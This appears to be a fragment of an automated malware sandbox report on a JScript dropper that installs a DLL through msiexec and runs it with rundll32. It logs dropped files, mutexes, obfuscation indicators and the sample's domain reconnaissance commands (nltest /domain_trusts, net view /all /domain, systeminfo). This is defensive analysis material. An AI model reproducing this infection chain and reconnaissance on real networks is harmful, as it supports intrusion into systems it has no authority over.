Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,	6_2_000000018008395A

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

4_2_006F3860

Source: C:\Windows\Installer\MSI3B6A.tmp

4_2_006F4BA0

Source: C:\Windows\Installer\MSI3B6A.tmp

Code function: 4_2_006F45B0 LoadResource,LockResource,SizeofResource,

4_2_006F45B0

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,

6_2_0000000180049AEC

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\runnung
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF428E4FF550ED71C3.TMP

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Installer\MSI3B6A.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq

Source: rundll32.exe, rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	Binary or memory string: select * from sqlite_sequence;
Source: rundll32.exe, rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a19_79b555791-28h97348k5477-3219g9.js"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3F033F6E254CA40A6D9A0D485CFEA9D1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI3B6A.tmp "C:\Windows\Installer\MSI3B6A.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\Installer\MSI3B6A.tmp	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3F033F6E254CA40A6D9A0D485CFEA9D1	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI3B6A.tmp "C:\Windows\Installer\MSI3B6A.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source:	Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Echo("failed: " + e.message); }}installFromURL();}

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\rundll32.exe

6_2_00000001800033E0

PE file contains an invalid checksum

Source: Update_3b24da5a.dll.6.dr	Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
Source: 360total.dll.2.dr	Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c

PE file contains sections with non-standard names

Source: 360total.dll.2.dr	Static PE information: section name: yhDm^
Source: Update_3b24da5a.dll.6.dr	Static PE information: section name: yhDm^

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071323C push ecx; ret	4_2_0071324F
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180010451 push rcx; ret	6_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001045A push rcx; ret	6_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018017500F push rdx; iretd	6_2_0000000180175010

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSI3B6A.tmp

Jump to behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Drops PE files

Source: C:\Windows\System32\rundll32.exe	File created: :wtfbbq (copy)	Jump to dropped file
Source: C:\Windows\System32\rundll32.exe	File created: C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\sharepoint\360total.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AAC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3B6A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A4C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A7C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI39EE.tmp	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AAC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3B6A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A4C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A7C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI39EE.tmp	Jump to dropped file

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,

6_2_0000000180049AEC

Extensive use of GetProcAddress (often used to hide API calls)

